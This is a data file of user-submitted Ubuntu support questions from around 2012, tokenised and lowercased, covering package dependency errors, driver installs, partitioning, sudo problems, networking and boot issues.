152784	altering partitions of hard drive	i 'm running ubuntu 12.04 64-bit . i need more disk space and my current configuration is as follows : filesystem size used avail use % mounted on /dev/loop0 17g 17g 6.1m 100 % / udev 1.9g 4.0k 1.9g 1 % /dev tmpfs 773m 860k 772m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 1.9g 364k 1.9g 1 % /run/shm /dev/sda3 284g 108g 176g 38 % /host overflow 1.0m 40k 984k 4 % /tmp the size of the windows partition /dev/sda3 is way more than i need . i 'd like to free up about 100-125 gb and move it to the ubuntu partition /dev/loop0 . i expect to be working with databases around 25 gb in size and want to have room to grow . are the instructions here : https : //help.ubuntu.com/community/resizeandduplicatewubidisk the most appropriate ones to use ? is there a compelling reason for me to consider using a different form of ubuntu installation ?
152786	why does pidgin start twice ?	i am using xubuntu . when i boot it up , pidgin comes in twice and chromium starts . i want only pidgin to start once , and no chromium . also , if i completely kill all pidgin and reboot , it only comes up once . pidgin is on the autostart menu , but i do not have it checked . chromium is not . i have also disabled saving the session on logout .
152787	where is the script executed when logging into a shell ?	when you login to either a tty or a remote machine by ssh there 's normally a banner which looks like this : welcome to ubuntu 12.04 lts ( gnu/linux 3.2.0-25-generic x86_64 ) * documentation : https : //help.ubuntu.com/ 0 packages can be updated . 0 updates are security updates . where is the script/group of scripts that produce this message located ? i 'd like to customise it . i assume that it 's part of the login process and not bash since you do n't see it every time a terminal is opened .
152790	error installing ruby-rvm	when i try to install ruby-rvm , i get this ... $ sudo apt-get install ruby-rvm reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ruby-rvm : depends : libreadline-gplv2-dev but it is not going to be installed e : unable to correct problems , you have held broken packages . alright , fine , so i 'll install libreadline-gplv2-dev . $ sudo apt-get install libreadline-gplv2-dev reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libsdl-ttf2.0-0 libdb5.1-java-gcj libdb-je-java gcj-4.6-jre-lib libecj-java ttf-dejavu-extra eclipse-platform-data ruby1.9.1-examples gcj-4.6-base libxerces2-java libswt-gtk-3-jni libgcj-bc libjtidy-java gstreamer0.10-fluendo-mp3 : i386 libicu4j-java libservlet2.4-java libswt-cairo-gtk-3-jni libcommons-beanutils-java junit libdb-java ruby1.9.1-dev libcommons-cli-java libtcltk-ruby1.9.1 libcommons-logging-java libcommons-compress-java libgcj12 libswt-gtk-3-java libdb5.1-java libicu4j-4.4-java libswt-gnome-gtk-3-jni libyaml-0-2 icedtea-netx-common libjsch-java libruby1.9.1-dbg jarwrapper libxml-commons-resolver1.1-java libhal1 ri1.9.1 libapache-pom-java libxt-dev libxml-commons-external-java tzdata-java libcommons-el-java libservlet2.5-java libcommons-httpclient-java libslf4j-java libasm3-java libregexp-java fastjar libjasper-java libruby1.9.1 libcommons-codec-java libcommons-lang-java libhamcrest-java liblucene2-java liboil0.3 : i386 libequinox-osgi-java libcommons-parent-java libcommons-collections3-java ruby1.9.1-full libgcj-common libcommons-digester-java libjetty-java libjline-java ruby1.9.1 libswt-webkit-gtk-3-jni libswt-glx-gtk-3-jni use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libreadline5 the following packages will be removed : libreadline-dev libreadline6-dev r-base-dev the following new packages will be installed : libreadline-gplv2-dev libreadline5 0 upgraded , 2 newly installed , 3 to remove and 0 not upgraded . need to get 375 kb of archives . after this operation , 258 kb of additional disk space will be used . do you want to continue [ y/n ] ? that looks bad . this will meddle with my java installation and remove r-base-dev ? what 's up with this ?
152791	errors when installing updates	i am getting the following errors when installing updates . they started to appear after i upgraded my system to 12.04 . errors were encountered while processing : samba-common samba-common-bin samba grub-pc grub-gfxpayload-lists setting up samba-common ( 2:3.6.3-2ubuntu2.2 ) ... perl : error while loading shared libraries : libperl.so.5.12 : can not open shared object file : no such file or directory dpkg : error processing samba-common ( -- configure ) : subprocess installed post-installation script returned error exit status 127 dpkg : dependency problems prevent configuration of samba-common-bin : samba-common-bin depends on samba-common ( > = 2:3.4.0~pre1-2 ) ; however : package samba-common is not configured yet . dpkg : error processing samba-common-bin ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of samba : samba depends on samba-common ( = 2:3.6.3-2ubuntu2.2 ) ; however : package samba-common is not configured yet . samba depends on samba-common-bin ; however : package samba-common-bin is not configured yet . dpkg : error processing samba ( -- configure ) : dependency problems - leaving unconfigured setting up grub-gfxpayload-lists ( 0.6 ) ... setting up grub-pc ( 1.99-21ubuntu3.1 ) ... perl : error while loading shared libraries : libperl.so.5.12 : can not open shared object file : no such file or directory dpkg : error processing grub-pc ( -- configure ) : subprocess installed post-installation script returned error exit status 127 any ideas how to fix this ?
152793	password not working for sudo ( `` authentication failure '' )	before i mention anything further , do not give me a response saying that terminal wo n't show password input . i 'm aware of that . i 'm typing my user password in ( not a capslock issue ) , and for some reason it still says 'authentication failure ' . is there some other password ( one i 'm not aware of ) i 'm supposed to be using other than my user password ? i 've had this ubuntu before , on another hard drive and i did n't have this problem . ( and it was the same ubuntu , ubuntu 12.04 lts ) ai @ ainekoyokai : ~ $ groups ai adm cdrom sudo dip plugdev lpadmin sambashare ai @ ainekoyokai : ~ $ lsb_release -rd description : ubuntu 12.04 lts release : 12.04 ai @ ainekoyokai : ~ $ pkexec cat /etc/sudoers # # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d i can log in with my password , but it 's not accepted as valid for authentication < -- that is pretty much my issue . ( although , i have n't gone into recovery mode . ) i 've ran : ai @ ainekoyokai : ~ $ ls /etc/sudoers.d readme and also reinstalled sudo with : pkexec apt-get update pkexec apt-get -- purge -- reinstall install sudo pkexec usermod -a -g admin $ user < - says admin does not exist su $ user < - worked for me , however , my password still does not do much ( in sense of not working for other things ) i changed my password with pkexec passwd $ user . i was able to change it no problem . gksudo xclock was something i was able to get into , no problem . ( clock showed ) ai @ ainekoyokai : ~ $ gksudo xclock
152799	error message : requires installation of untrusted packages	how do i fix this problem ? ? i have been getting it for days now and it is really annoying me ! : ' (
152804	see what application uses the webcam data	i have a c270 logitech webcam and i just noticed , that the led is on , indicating that the webcam is recording . however there is no application ( i would be aware of ) using the webcam . so how do i find out how and what activated it ? system is ubuntu 12.04 with the 3.4 rc 4 kernel
152805	no sudo permissions to /etc/hostname	when i try to edit my /etc/hostname file , using sudo nano /etc/hostname ( or any other editor ) i get the following : error writing /etc/hostname : permission denied i then tried : sudo chmod u+w ./hostname and got the error : chmod : changing permissions of `./hostname ' : operation not permitted i get the same error trying to add write permissions to any use or group . this is what ls shows : -rw-r -- r -- 1 root root 22 2012-06-18 12:25 /etc/hostname any idea why and what can i do about it ? i 'm running ubuntu 11.10 .
152808	nvidia gforce 610m drivers	i 'm attempting to install drivers for my gforce 610m and none of the solutions seems to work . generally people recommend using the jockey-gtk program , which does n't detect the card and states that there 's no propitiatory drivers to install . i tried download the official binary from the nvidia site , but that told me that i had to remove the nouveau kernal driver , so i did that , following the instructions on the wiki ( apt-get remove -- purge xorg-something or other ) and ignoring the `` do n't do this '' warning , after that did n't do anything i installed various packages ( nvidia-common , nvidia-settings , etc ) and eventually got the nvidia-settings program ( and a very low screen resolution ) . unfortunately when i open nvidia-settings it tells me to run nvidia-xconfig as root ( i 've done this several times , but to no avail ) and does n't let me configure anything . at this point i tried re-running the binary installer i downloaded from nvidia 's site , and it said it worked but it did n't change a thing . so i 'm out of ideas , what 've you got ?
152810	is the cpu power management set permanently to performance mode in 12.04 ?	after installing 12.04 from 11.04 and using the gnome-fallback desktop i installed the cpu scaler app in the top bar . it shows that my laptop is always running in performance mode and never goes to on-demand shortly after bootup like it did in 11.04 . i have to change it manually now . i am wondering if performance is now standard in 12.04 or if the applet is just not working correctly . i honestly cant tell the difference in performance when i select either one and according to my temperature monitor there is no difference between the two either ( except that in on-demand the cpu frequency changes between 800 mhz and 2.27 ghz ) and in performance it stays constantly at 2.27 ghz ) . powersave does make my laptop run cooler and slower as it stays at 800 mhz . has anyone else come across this at all ? thanks much for reading this .
152812	how to remove ubuntu from dual boot system with windows 7 ?	i wish to remove ubuntu and i 'm not quite sure how . i know it has something to do with partitions . i have 3 partitions . 1 . os [ 683 gb ] 2 . recovery [ 14 gb ] 3 . ubuntu 12.04 lts ( e : ) i know it says ubuntu but when i installed ubuntu i think i put 14 gigabytes for it so i think its the recovery one but i 'm not sure . i could have sworn i put more than 700 megabytes for it . i have googled this and i ca n't seem to find an answer . any help would be nice .
152821	pros and cons to default workgroup	i 'm setting up an ubuntu 12.04 lts samba server . a lot of guides tell you to change workgroup from the default 'workgroup ' to something else , e.g . smb.conf `` workgroup = ubuntu_home '' i see the practical reason why some would want there files to be more private by changing the workgroup name ; and perhaps have more control of who see 's there data ; however , by using the default workgroup name it allows other people on the domain to connect to the shares with little effort as most computers are default 'workgroup ' the sole purpose of my ubuntu server is to share files across my network to my roommates ' computers and to xbmc . if this is my goal , then is there any real reason to change the default workgroup ? am i missing anything ? security ? flexibility ?
152822	how to write `` o '' with upper-line in ubuntu ?	how do you write a character `` o '' with upper-line in ubuntu ? is it possible ?
152823	can not add repository key	i just installed my new laptop with ubuntu 12.04 and when i 'm trying to add key , there is a `` network unreachable '' error . william @ ubuntu : ~ $ gpg -- keyserver hkp : //keys.gnupg.net -- recv-keys 1c4cbdcdcd2efd2a gpg : requesting key cd2efd2a from hkp server keys.gnupg.net ? : keys.gnupg.net : network is unreachable gpgkeys : http fetch error 7 : could n't connect : network is unreachable gpg : no valid openpgp data found . gpg : total number processed : 0 i 'm so sure the keyserver is not down , because i tried it again at my old laptop running ubuntu 11.04 william @ william : ~ $ gpg -- keyserver hkp : //keys.gnupg.net -- recv-keys 1c4cbdcdcd2efd2a gpg : requesting key cd2efd2a from hkp server keys.gnupg.net gpg : key cd2efd2a : `` percona mysql development team < mysql-dev @ percona.com > '' not changed gpg : total number processed : 1 gpg : unchanged : 1 is this a bug ?
152827	why can i download anything from the internet ?	i get this error message : archive : /home/nicole/downloads/ilividsetupv1.exe [ /home/nicole/downloads/ilividsetupv1.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/nicole/downloads/ilividsetupv1.exe or /home/nicole/downloads/ilividsetupv1.exe.zip , and can not find /home/nicole/downloads/ilividsetupv1.exe.zip . why is ubuntu doing this ? . i can no longer use my ipod , download songs , download software .
152829	bash script throws `` syntax error near unexpected token ` } ' '' when run	i am trying to write a script to monitor some battery statuses on a laptop running as a server . to accomplish this , i have already started to write this code : # ! /bin/bash # a script to monitor battery statuses and send out email notifications # take care of looping the script for ( ( ; ; ) ) do # first , we check to see if the battery is present ... if ( cat /proc/acpi/battery/bat0/state | grep 'present : * ' == present : yes ) { # code to execute if battery is present # no script needed for our application # you may add scripts to run } else { # if the battery is not present , run this code sendemail -f my-email @ gmail.com -t 214******* @ txt.att.net -u nta tv alert -m `` the battery from the computer is either missing , or removed . please check asap . '' -s smtp.gmail.com -o tls=yes -xu my-email @ gmail.com -xp *********** } # second , we check into the current state of the battery if ( cat /proc/acpi/battery/bat0/state | grep 'charging state : * ' == 'charging state : charging ' ) { # code to execute if battery is charging sendemail -f my-email @ gmail.com -t 214******* @ txt.att.net -u nta tv alert -m `` the battery from the computer is charging . this might mean that something just happened '' -s smtp.gmail.com -o tls=yes -xu my-email @ gmail.com -xp *********** } # if it is n't charging , is it discharging ? else if ( cat /proc/acpi/battery/bat0/state | grep 'charging state : * ' == 'charging state : discharging ' ) { # code to run if the battery is discharging sendemail -f my-email @ gmail.com -t 214******* @ txt.att.net -u nta tv alert -m `` the battery from the computer is discharging . this should n't be happening . please check asap . '' -s smtp.gmail.com -o tls=yes -xu my-email @ gmail.com -xp *********** } # if it is n't charging or discharging , is it charged ? else if ( cat /proc/acpi/battery/bat0/state | grep 'charging state : * ' == 'charging state : charged ' ) { # code to run if battery is charged } done i 'm pretty sure that most of the other stuff works correctly , but i have n't been able to try it because it will not run . whenever i try and run the script , this is the error that i get : ./batmon.sh : line 15 : syntax error near unexpected token ` } ' ./batmon.sh : ` } ' is the error something super simple like a forgotten semicolon ?
152830	is it possible to create a ramdisk of more than 4 gb in a 32bit system ?	i 'm planning on building my desktop computer to have a ramdisk . at the moment my pc has 4 gb ram , and i was thinking if it is possible to go beyond 4 gb and use the extra ram as a ramdisk .
152833	how do i bind two different keyboard keys to the system mute function ?	so , i want to bind two different keyboard keys to the system mute function . i go to system settings > keyboard > shortcuts > sound and media and find the volume mute setting and enter the second shortcut i want for it . however , this deletes the first shortcut . how can i bind two keys to this function ?
152834	i try install dhcp3-server , but /etc/init.d/dhcp3-server file is missing . whats going on ?	i 've found several how-to 's that essentially go through the same process in setting up dhcp . here 's a link that has the list of step needed install and setup dhcp . i follow all the steps and find that the sudo /etc/init.d/dhcp3-server restart portion returns command not found only to reveal the the file does n't even exist . i 've installed ( sudo apt-get install dhcp3-server ) and uninstalled ( sudo apt-get remove dhcp3-server ) two or three times . i 'm pretty sure my config files are good because i 've had to check them three times . but i do n't think i 'm to that point of being able to see them action it . i cant control the process . why is the file missing ? how is it supposed to get there ? help ?
152847	how to access boot options 12.04 live usb	edit : i 've now gotten to the point where i can type in a boot line . i just need to know what to enter . does anybody know what the default boot line for the ubuntu live cd is ? after that i think i just need to add nomodeset and it should boot . i 'm attempting to install 12.04 on my computer but booting from my usb drive results in a blank screen . this has happened since 10.04 and has always been fixed by putting nomodeset in the boot command , but now i ca n't access the boot options with f6 for some reason . how can i access the boot options ? i booted into the live image on a different computer and it worked fine . i 'm sure it 's because of my nvidia graphics . when i boot into the live image it shows a small gray box in the lower left corner of the screen and that 's it . i ca n't edit the boot options or do anything else . thanks in advance .
152849	why is ubuntu asking me for a password ? ( i did n't set one . )	i 'm from mexico city , living in the us now . i recently put ubuntu in my pc and tried to set the wireless connection but i need a five digit password i never set . do you now how to change this ? thanks so much and i really like ubuntu , having used it on my computer in mexico .
152850	why ca n't i change the keyboard layout ? only one step	i have two languages . if i press alt + shift the language changes to arabic . if i press it again , not due to english .
152852	incomplete ubuntu 12.04 install dual-boot xp	this weekend has been the 1st time i 've tried to install ubuntu . on the initial install , ( i am using a usb ) the installation went all the way through and asked to restart when completed . i was not able to get grub to boot and kept going through windows . after some research i found some articles on updating/reinstalling grub , so i followed those . i finally got grub to load after a day but there was no windows option only the ubuntu 12.04 which when i selected it only gave me a fatal error 17 . i booted from the usb again and deleted the partitions and installed again . this time i got an error 15 . i then booted through xp and downloaded the wubi.exe and uninstalled ubuntu and reinstalled again . the installation went to the very end and then gave an error message ( which i do n't remember exactly what it said ) something along the lines of checking my logs on my c drive . i then uninstalled ubuntu and removed the wubi.exe file and wiped my usb and did the download to the usb again . booted through usb and ran the install process again . it again went through the install process but after creating username and password and hitting continue , the installation dialogue box disappears and the mouse spinning wheel is displayed , but i do not receive the prompt to restart . i can still access the side menu for ubuntu but the wheel keeps spinning . how do i get ubuntu to install properly ?
152853	blank screen after logging in	i just installed the 64 bit version onto my laptop . it is the only operating system on the computer . after the initial setup and restart , i tried to log in , but after i typed my password and hit enter , the screen just went black . tried to restart several times and had the same problem . not sure what to do . i tried to use the 32 bit version instead but it does n't even install . my computer is 64 bit , 200 g hard drive , 2 ghz processor , 4 g ram
152855	updating , etc. , automatically	is there a way to set up ubuntu 12.04 ( or earlier versions ) so that all recommended updates are done automatically , say once a week ? when i say automatically , i mean no password entry or user intervention required . this sounds like a stupid request , so let me tell why i 'm asking . my grandfather knows nothing about computers ; he uses his solely to read yahoo ! mail . i want to get rid of his clunky , spyware-ridden windows xp and install ubuntu . i want to set it up so when he turns the computer on , after a couple minutes , voila ! , yahoo ! mail , already signed in , ready to go . the problem is i do n't want to have to go over there every week or so and make sure everything is up-to-date , he has n't accidentally installed any spyware , etc . so can this be done ? is this the best way to set things up for my grandfather ? are there other things i should be worried about when it comes to keeping things hassle-free for him ? please do n't post anything like `` why not teach him how to ... blah blah blah '' . my grandfather is 80 years old and has made it clear email is the only thing he will ever use a computer for ! thanks !
152857	what is the difference between the various ubuntu flavours ?	what is the main difference between ubuntu , kubuntu , mythbuntu , xubuntu , edubuntu and lubuntu ?
152868	how do i make a ram disk ?	i want to make a partition that is made of ram ... example in windows 7 you can make a partition that is made of ram i have created 1 gb of partition in ram . using primo ramdisk is there any good alternative in ubuntu ?
152869	slow wireless about 1/3 bandwidth of wired from cable modem	hp dv6000 wireless g broadcom netgear wndr3400 router properly configured . windows laptops using wireless g and n are considerably faster than mine . 12.04 lts , all restricted drivers and all up to date . 50mbps wired and 9-21 mbps wireless on ubuntu . 00:14.0 bridge [ 0680 ] : nvidia corporation mcp51 ethernet controller [ 10de:0269 ] ( rev a3 ) subsystem : hewlett-packard company presario v6133cl [ 103c:30b7 ] kernel driver in use : forcedeth -- 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11a/b/g [ 14e4:4312 ] ( rev 02 ) subsystem : hewlett-packard company broadcom 802.11a/b/g wlan [ 103c:1370 ] kernel driver in use : wl
152874	how to fix `` apt-get upgrade '' errors ?	i get these errors when i try to upgrade the packages installed on my ubuntu system : m @ m-desktop ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 2 not fully installed or removed . after this operation , 0b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up drbd8-source ( 2:8.3.7-1ubuntu2.3 ) ... removing old drbd8-8.3.7 dkms files ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 8.3.7 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . loading new drbd8-8.3.7 dkms files ... first installation : checking all kernels ... building only for 2.6.35-22-generic building for architecture i386 building initial module for 2.6.35-22-generic error ! bad return status for module build on kernel : 2.6.35-22-generic ( i386 ) consult the make.log in the build directory /var/lib/dkms/drbd8/8.3.7/build/ for more information . dpkg : error processing drbd8-source ( -- configure ) : subprocess installed post-installation script returned error exit status 10 dpkg : dependency problems prevent configuration of drbd8-utils : drbd8-utils depends on drbd8-source ; however : package drbd8-source is not configured yet . dpkg : error processing drbd8-utils ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : drbd8-source drbd8-utils e : sub-process /usr/bin/dpkg returned an error code ( 1 ) m @ m-desktop ~ $
152878	if i change to ubuntu will it save the things i have on my laptop right now ?	i have a windows 7 right now on my inspiron dell duo . i have done this before ; i changed it to ubuntu when i first got it . i changed it back to a windows 7 because i did n't adore it as much but i used my bro 's laptop for a week which has ubuntu and i realized i absolutely love it ! now that i 've had my laptop for around 8 months , i have tons of things on it ( obviously ) and i want to change it to ubuntu . if i change it , will the stuff on my computer right now still be there if i change it from windows 7 to ubuntu ? ? i hope that makes sense.. thank you ! ! xx
152881	what may cause ubuntu to not be able to shut down and limp in the logout screen ?	i know , that this question seems to be too general , but i would appreciate any ideas , which could help me start diagnosis of the problem . my problem is that sometimes ( about 50 % of the time ) i am unable to shut down the system properly . i click shut down ... , the desktop dissapears and a purple screen with ubuntu logo appears . the same screen that appears when i turn on the system . only difference is that there is no indication of any action . the dots under the logo , that usually blink in sequence are all still and after no action for a few minutes , i turn on the computer manually . the computer shows no visible problems , it is a new machine and boots perfectly each time . i am just concerned , that this is not the right way to do things . please could you hint me some possible causes ? edit : recently i got a `` sorry , ubuntu 12.04 experienced an internal error '' message . the executable is : usr/lib/x86_64-linux-gnu/colord/colord and the cause is a segmentation fault . so maybe i should just report the problem and wait it out , right ?
152882	how do i post to gwibber from python ?	how do i post to gwibber from python ? i have tried import gwibber.utils foo = gwibber.utils.gwibberpublic ( ) foo.post ( `` this is a test message '' ) from https : //wiki.ubuntu.com/quickly/snippets . but it does n't work .
152883	will quickly + pyside work properly like any quickly application ?	i was thinking of using quickly but i do n't like glade and i want to use pyside . i want to start my starch . should i delete all the files and create a pyside python file ? will quickly still work with it and will it be considered for ubuntu app showdown ? let me tell you that pyside is the official python bindings to qt and it is under the lgpl license and it is available in default ubuntu repository . so tell me a good practice but i will still like to use unity and ubuntu specific libraries or components that quickly has .
152891	ubuntu freezes after grub	i have a dual boot system with windows 7 and ubuntu 12.04 . after cloning my 320 gb hdd to a 500 gb hdd , my system freezes imediately after grub when starting ubuntu and the screen begins to whitewash . i am still able to start ubuntu however if i press alt+ctrl+del when it 's frozen , after it restarts , it seems to boot just fine . could this have been caused by the cloning proccess ? how can i repair it ? i have the ubuntu install disk handy , what is the best way to scan for and repair linux system errors ? clone tool used : apricorn ez gig iv desktop manager : light dm desktop : gnome-shell 3.4.1-0ubuntu2 it has been a while folks and no-one has been able to help so far . if it helps , every time i boot it always locks up and the screen whitewashes , and when i hit alt+ctrl+del it will then boot up just fine every time without fail . i am able to open ubuntu , however , i would like to be able to boot without having to see my bios splash and grub twice before doing so . i would also like to note that i began having issues with win 7 after i cloned the disk , so i had to re-install it , but have n't had a problem since . i do not want to have to re-install ubuntu yet again . someone please help !
152892	wifi connects but after a bit of use internet does not work	i have an rnx-n300x wireless card . the card will connect to both the router and the internet but if i use about 10mb the internet will stop working . the card remains connected to the router though . to fix it i have to reconnect to the router and it 'll let me use another 10mb or so . i remember i did not have any problems on previous versions of ubuntu just on this latest one . i also have the same problem on the latest mint version but not the previous .
152897	how do i install ubuntu on my computer and not a usb stick ?	i 'm running ubuntu off my usb drive , and the `` install ubuntu 12.04 lts '' wizard keeps trying to install ubuntu on my usb drive rather than my real computer , and i ca n't seem to change it . how do i resolve this problem ?
152903	is this a kernel panic or a kernel oops ?	this is a photo i tried accessing my /var/logs , but i 'm unsuccessful . is this a panic or an oops ? it has happen about 3 times in 24 hours . could it be due to a corrupt media ? the ubuntu server install is about 24 hours old and this computer is fairly old 2005 amd athlon 64 - 4600 . it 's running great besides this small hiccup . kernel 3.0.25 - upgraded using apt-get dist-upgrade immediately after install . so i do n't know if its a kernel issue or perhaps something else . here is the log that i took a photo of .
152904	problem enabling `` networking '' options gui	from couple of days i 'm facing this problem ? when i turn on my system ( i 'm using ubuntu 12.04 ) , i dont get various networking option 's when i click the networking option ( in top right corner of the panel ) , rather i get as seen in below image , so , i have to untick enable networking ( as seen above ) , and then again tick it to get all those options related to networking . when i do so i get option 's as seen in below image , thus my question is , how this can be done automaticaly ? insted of mi unticking ( i.e . disabeling ) and then reticking ( i.e . enabling ) the enable networking option . thankyou !
152906	what will happen if i install the latest version of an existing library by building from source ?	i am a noob with linux and i use synaptic package manager to install all the software i need . i did so also for mathgl , the library for scientific graphs . recently a new version appeared online , but not in the package manager . i downloaded the sources and tried to install it manually . the instructions said : cmake . cmake . make make install i did exactly the same , but then i realized that i forgot some build options . i did a web search to find a way how to uninstall the library , so that i can install it with the new settings , but i did not get a clear answer . what i found out is that when it comes to uninstalling under linux , unless the developer provided an uninstall script , you are on your own and it is not trivial . with this in mind i just tried to install the library without removing the misconfigured one . cmake -d enable-all=on -d enable-langall=on . cmake -d enable-all=on -d enable-langall=on . make make install everything seems to be fine . my question is this : is there any chance that the consequence of my action will come back to haunt me ? i am also concerned , because the old library was not removed as well as the old headers . another strange thing is that the old headers are in /usr/lib/mgl while the new ones are in /usr/local/lib/mgl2 is there any explanation for this ?
152909	how to install libgdal1 1.9.1 in ubuntu 12.04 ?	in ubuntu 12.04 the libgdal version is 1.7.x and qlandkarte 1.4 needs libgdal1 = > 1.9.1 .
152911	change prompt of terminal , permanently | how	how can i change prompt name seen at terminal ? my prompt : < user_name > @ < user_name > -mega-book-vr320 : ~ $ it is too long . i want to change it as : gcc : however , i should see path when i have go from one directory to another . gcc : ~ $ cd x_directory gcc : ~/x_directory $ how can i do that , permanently ?
152913	load average is too high	i installed ubuntu 12.04 on my laptop . even if when i am doing nothing , load average is somewhere between 0.50 to 0.60. laptop configuration is toshiba satellite c640 intel core i5-2430m ( 2.3ghz , 3mb l2 cache ) 6gb ram how can i make sure all drivers are installed properly ? or how to get to root of the problem ?
152914	how can i copy the text of an unreportable error ?	occasionally i receive an error report from ubuntu with the option to send in the details of the error . however , if the error was generated from a non-official package ( local installation or ppa ) i can not just click submit to send in the error . how can i copy all the error details so that i can manually submit them to the appropriate project ?
152915	hd 6770m low graphics mode after update ( again )	i have ubuntu 12.04 lts ( re ) installed on this laptop : i 've also installed the fglrx-drivers for my ati card ( using apt-get ) , it appeared to work fine , that is until i updated my distro . once again i got the `` low graphics mode '' error when i booted into the new kernel , booting in the old kernel works fine however . when i look into the logs i see `` no screen found '' . this is the second time i install ubuntu and the second time i run into problems with my graphics . reinstalling is n't a solution since the problem keeps comming back . my question now is : does anyone know a real solution for this issue ar at least knows what 's causing it ? any help would be greatly appreciated .
152916	software installation problem in ubuntu 12.04	`` wine '' software installation problem in ubuntu 12.04. the problem is= > the following packages have unmet dependencies : wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.1.2ubuntu7 is to be installed depends : libc6 ( > = 2.11 ) but 2.15-0ubuntu10 is to be installed depends : wine1.4-i386 ( = 1.4-0ubuntu5~precise1~ppa1 ) but 1.4-0ubuntu5~precise1~ppa1 is to be installed plz help me ... ... ...
152925	i have 12.04 but i can not get updates	the text do you want to start the upgrade ? appears , but there is no place to press yes .
152927	is a port of an existing program eligible for the app showdown ?	for example , the original program is xlib based , and i port it to gtk3 . what about porting my old gtk2-based app to gtk3 ? are either of these two eligible for entrance into the app showdown ?
152930	is there any alternative for gnome-appearance-properties ?	gnome-appearance-properties is no more available in gnome3 and newer . i want to change background and text colors of windows , input boxes , selected items , etc . and customize theme . is there any application available to do that ?
152941	wine installation problem	when i try to install wine i get this fault the following packages have unmet dependencies : wine1.5 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.1.2ubuntu7 is to be installed depends : libc6 ( > = 2.11 ) but 2.15-0ubuntu10 is to be installed depends : wine1.5-i386 ( = 1.5.6-0ubuntu1~pulse17 ) but 1.5.6-0ubuntu1~pulse17 is to be installed
152943	how can i upgrade from ubuntu 6.06 ?	please help me upgrade my ubuntu cause it 's hard for me to update firefox and ca n't install flash player . i tried the terminal but it did n't work .
152948	how to set an environment variable for system users	how can i change the environment variable path for all users , even system users which have no home directory ? i have tried setting it in /etc/environment and /etc/login.defs but the changed do not get reflected after loggin in again . what is the best place to make these changes ? thanks dan
152949	nvidia geforce gt 555m driver install problem	i recently installed ubuntu 12.04 on my asus n55sf , which runs nvidia geforce gt 555m and an integrated graphics , via optimus but after installation i found no such thing on ubuntu . i went o nvidia website and installed the driver from there ( ver 259.59 i guess ) after reboot , i was stuck at 640x480 resolution and my card was still undetected i reinstalled ubuntu but this time i installed bumblebee , but the system settings still shows the graphics as 'unknown' i dont know whether the driver has been installed or not , but from the 'unknown ' i figure its not there . when i run sudo nvidia-settings i get this msg '' you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run nvidia-xconfig as root ) , and restart the x server . '' however i can run the settings page by sudo nvidia-settins -c :8 i just want to know why ubuntu hasnt still detected the gpu ? is it because bumblebee disables it ? and i forgot one v important thing..i am a noob : (
152950	accomplishments daemon fails to connect	my ubuntu accomplishment fail to start as the error i got is : the daemon fail to connect . please advice . running accomplishment-viewer in the terminal gave me this output : pidfile /home/r00t/twistd.pid contains non-numeric value starting the daemon using command `` twistd -noy /usr/bin/accomplishments-daemon -- logfile=/home/r00t/.cache/accomplishments/logs/daemon.log & `` this was in the daemon.log : http : //paste.ubuntu.com/1048791/
152958	port 21 will not open . status is closed . forward port 21 to new domains .	i am having a problem opening port 21 on my linux ubuntu server . no matter what i do , i can not get my status to change from closed to open . here is a recent iptables command i used and the result iptables -a input -p tcp -m tcp -- dport 21 -j accept nmap -p21-22,25,80,443 ccr1 starting nmap 4.53 ( http : //insecure.org ) at 2012-06-19 03:13 cdt interesting ports on ccr1.chennaichristianradio.com ( 5.10.69.98 ) : port state service 21/tcp closed ftp 22/tcp open ssh 25/tcp closed smtp 80/tcp open http 443/tcp closed https i also used commands from the advise from this forum http : //www.cyberciti.biz/faq/iptables-open-ftp-port-21/ i need to open this for ftp access to the server , and ultimately i need to forward port 21 to 2 domains i am setting up . thank you for any assistance you can provide -bob swaggerty
152962	boot windows os by clicking on an icon in ubuntu	is there a way to boot windows by clicking on an icon in ubuntu unity ?
152964	why is n't my `` launchpad registration '' accomplishment showing up ?	i registered to launchpad about a year ago , but i have n't got the trophy . do i have to do something more ? it 's been a few days since i started using ubuntu accomplishments . and how does the verification work ? do i get a verification email or something ?
152965	is there a way to reset windows xp administrator password ?	can i reset a windows xp administrator password ? how would i do it ?
152974	ubuntu one on windows 7 can not finish getting information	i always have this problem since i 've installed ubuntu one on my new windows 7 computer . in the position circled in red there should be a button for log-in/out . how can i fix this ?
152986	why does software center fail to open with a `` could not get usefulness ... '' error ?	when opening software center , the operation is stuck after opening the window and upper bar . the error message when launching from terminal is : 2012-06-19 12:53:33,684 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file
